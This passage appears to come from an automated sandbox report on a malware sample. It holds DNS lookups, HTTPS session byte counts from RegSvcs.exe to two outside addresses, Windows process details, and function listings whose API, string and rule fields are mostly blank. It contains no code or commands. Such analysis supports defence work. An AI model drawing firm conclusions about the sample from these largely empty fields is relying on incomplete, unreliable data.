| Jan 14, 2025 18:01:09.959949970 CET | 61007 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.966897964 CET | 53 | 61007 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.898705006 CET | 57898 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:11.908072948 CET | 53 | 57898 | 1.1.1.1 | 192.168.2.10 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 14, 2025 18:01:09.868068933 CET | 192.168.2.10 | 1.1.1.1 | 0x8b67 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.877880096 CET | 192.168.2.10 | 1.1.1.1 | 0x402c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.890770912 CET | 192.168.2.10 | 1.1.1.1 | 0x115c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.903270960 CET | 192.168.2.10 | 1.1.1.1 | 0x61b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.914056063 CET | 192.168.2.10 | 1.1.1.1 | 0x41af | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.924696922 CET | 192.168.2.10 | 1.1.1.1 | 0x4527 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.936321974 CET | 192.168.2.10 | 1.1.1.1 | 0x1038 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.947254896 CET | 192.168.2.10 | 1.1.1.1 | 0x50b1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.959949970 CET | 192.168.2.10 | 1.1.1.1 | 0x7537 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:11.898705006 CET | 192.168.2.10 | 1.1.1.1 | 0xb087 | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 14, 2025 18:01:09.876349926 CET | 1.1.1.1 | 192.168.2.10 | 0x8b67 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.886950016 CET | 1.1.1.1 | 192.168.2.10 | 0x402c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.900130987 CET | 1.1.1.1 | 192.168.2.10 | 0x115c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.911900043 CET | 1.1.1.1 | 192.168.2.10 | 0x61b | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.923238039 CET | 1.1.1.1 | 192.168.2.10 | 0x41af | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.933404922 CET | 1.1.1.1 | 192.168.2.10 | 0x4527 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.945915937 CET | 1.1.1.1 | 192.168.2.10 | 0x1038 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.958478928 CET | 1.1.1.1 | 192.168.2.10 | 0x50b1 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Jan 14, 2025 18:01:09.966897964 CET | 1.1.1.1 | 192.168.2.10 | 0x7537 | No error (0) | 104.102.49.254 | A (IP address) | IN (0x0001) | false | ||
| Jan 14, 2025 18:01:11.908072948 CET | 1.1.1.1 | 192.168.2.10 | 0xb087 | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
| Jan 14, 2025 18:01:11.908072948 CET | 1.1.1.1 | 192.168.2.10 | 0xb087 | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:11 UTC | 219 | OUT | |
| 2025-01-14 17:01:11 UTC | 1905 | IN | |
| 2025-01-14 17:01:11 UTC | 14479 | IN | |
| 2025-01-14 17:01:11 UTC | 16384 | IN | |
| 2025-01-14 17:01:11 UTC | 3768 | IN | |
| 2025-01-14 17:01:11 UTC | 510 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:12 UTC | 266 | OUT | |
| 2025-01-14 17:01:12 UTC | 8 | OUT | |
| 2025-01-14 17:01:13 UTC | 1125 | IN | |
| 2025-01-14 17:01:13 UTC | 7 | IN | |
| 2025-01-14 17:01:13 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:13 UTC | 267 | OUT | |
| 2025-01-14 17:01:13 UTC | 47 | OUT | |
| 2025-01-14 17:01:14 UTC | 1128 | IN | |
| 2025-01-14 17:01:14 UTC | 241 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN | |
| 2025-01-14 17:01:14 UTC | 1369 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.10 | 49728 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:14 UTC | 281 | OUT | |
| 2025-01-14 17:01:14 UTC | 12823 | OUT | |
| 2025-01-14 17:01:15 UTC | 1132 | IN | |
| 2025-01-14 17:01:15 UTC | 20 | IN | |
| 2025-01-14 17:01:15 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.10 | 49737 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:16 UTC | 277 | OUT | |
| 2025-01-14 17:01:16 UTC | 15026 | OUT | |
| 2025-01-14 17:01:16 UTC | 1128 | IN | |
| 2025-01-14 17:01:16 UTC | 20 | IN | |
| 2025-01-14 17:01:16 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.10 | 49745 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:17 UTC | 285 | OUT | |
| 2025-01-14 17:01:17 UTC | 15331 | OUT | |
| 2025-01-14 17:01:17 UTC | 5105 | OUT | |
| 2025-01-14 17:01:17 UTC | 1129 | IN | |
| 2025-01-14 17:01:17 UTC | 20 | IN | |
| 2025-01-14 17:01:17 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:18 UTC | 280 | OUT | |
| 2025-01-14 17:01:18 UTC | 1212 | OUT | |
| 2025-01-14 17:01:18 UTC | 1130 | IN | |
| 2025-01-14 17:01:18 UTC | 20 | IN | |
| 2025-01-14 17:01:18 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:19 UTC | 277 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:19 UTC | 15331 | OUT | |
| 2025-01-14 17:01:22 UTC | 1131 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 8 | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2025-01-14 17:01:23 UTC | 267 | OUT | |
| 2025-01-14 17:01:23 UTC | 82 | OUT | |
| 2025-01-14 17:01:23 UTC | 1123 | IN | |
| 2025-01-14 17:01:23 UTC | 54 | IN | |
| 2025-01-14 17:01:23 UTC | 5 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 1 |
| Start time: | 12:01:05 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7b2bb0000 |
| File size: | 452'608 bytes |
| MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 2 |
| Start time: | 12:01:05 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff620390000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 8 |
| Start time: | 12:01:09 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x190000 |
| File size: | 45'984 bytes |
| MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 9 |
| Start time: | 12:01:09 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x150000 |
| File size: | 45'984 bytes |
| MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 10 |
| Start time: | 12:01:09 |
| Start date: | 14/01/2025 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xa40000 |
| File size: | 45'984 bytes |
| MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
Execution Graph
| Execution Coverage: | 2% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 0% |
| Total number of Nodes: | 5 |
| Total number of Limit Nodes: | 0 |
Graph
Function 00007FF7C10A0FA4 Relevance: .8, Instructions: 850COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF7C10A1390 Relevance: .2, Instructions: 180COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF7C10A1648 Relevance: 1.2, Instructions: 1177COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF7C0FD514A Relevance: .2, Instructions: 172COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF7C0FDA5D9 Relevance: .1, Instructions: 118COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF7C0FDA619 Relevance: .1, Instructions: 67COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF7C0FD5198 Relevance: .1, Instructions: 65COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Execution Graph
| Execution Coverage: | 8.7% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 48.6% |
| Total number of Nodes: | 286 |
| Total number of Limit Nodes: | 29 |
Graph
Function 0043B500 Relevance: 30.5, APIs: 11, Strings: 6, Instructions: 745memorycomCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00408860 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 190threadCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004097E0 Relevance: 9.2, Strings: 7, Instructions: 404COMMON
Download Yara Rule
Control-flow Graph
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040AEC0 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042EA61 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043FCF0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043E560 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00441EC0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00427B30 Relevance: .3, Instructions: 282COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00420B20 Relevance: .1, Instructions: 103COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040BA1B Relevance: .1, Instructions: 89COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043FB02 Relevance: .0, Instructions: 40COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E09A Relevance: 1.6, APIs: 1, Instructions: 100COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043FEB4 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043FC80 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004357CC Relevance: 1.5, APIs: 1, Instructions: 28COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00432F73 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040CAC0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040CAFE Relevance: 1.5, APIs: 1, Instructions: 17COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043E530 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043E510 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00425870 Relevance: 19.5, Strings: 15, Instructions: 726COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042D2E0 Relevance: 12.7, Strings: 10, Instructions: 242COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00409390 Relevance: 10.4, Strings: 8, Instructions: 391COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00416258 Relevance: 10.3, Strings: 8, Instructions: 277COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00427E30 Relevance: 6.8, Strings: 5, Instructions: 578COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0041ADE2 Relevance: 6.7, Strings: 5, Instructions: 496COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043EB40 Relevance: 5.6, Strings: 4, Instructions: 629COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00416A39 Relevance: 4.4, Strings: 3, Instructions: 648COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00427E50 Relevance: 4.4, Strings: 3, Instructions: 644COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0041A7C6 Relevance: 3.9, Strings: 3, Instructions: 161COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00413C90 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0041C620 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00429CD0 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E25A Relevance: 2.6, Strings: 2, Instructions: 94COMMON
Download Yara Rule
| Strings |
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00417AB2 Relevance: 1.9, Strings: 1, Instructions: 661COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00414710 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00421550 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00420534 Relevance: 1.7, Strings: 1, Instructions: 429COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042CAD0 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043C0A0 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004298A0 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042F0BD Relevance: 1.5, Strings: 1, Instructions: 298COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042F12D Relevance: 1.5, Strings: 1, Instructions: 293COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042F1D9 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00414559 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042D890 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042D8F5 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0044011F Relevance: 1.4, Strings: 1, Instructions: 127COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042D859 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E96A Relevance: 1.3, Strings: 1, Instructions: 61COMMON
Download Yara Rule
| Strings |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004412D0 Relevance: .7, Instructions: 673COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004075F0 Relevance: .6, Instructions: 625COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004413C0 Relevance: .6, Instructions: 607COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004413D9 Relevance: .6, Instructions: 598COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004413D7 Relevance: .6, Instructions: 597COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004414C0 Relevance: .5, Instructions: 529COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00441560 Relevance: .5, Instructions: 481COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 004415F0 Relevance: .5, Instructions: 478COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00421A80 Relevance: .5, Instructions: 453COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00429CB7 Relevance: .4, Instructions: 374COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00442320 Relevance: .3, Instructions: 279COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0041A0E0 Relevance: .2, Instructions: 183COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043C480 Relevance: .1, Instructions: 130COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00441940 Relevance: .1, Instructions: 123COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043B210 Relevance: .1, Instructions: 106COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043E7C0 Relevance: .1, Instructions: 98COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0043CF68 Relevance: .1, Instructions: 82COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00438600 Relevance: .1, Instructions: 64COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042B3D0 Relevance: .1, Instructions: 63COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0040A416 Relevance: .1, Instructions: 62COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 0042E815 Relevance: .1, Instructions: 60COMMON
Download Yara Rule
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
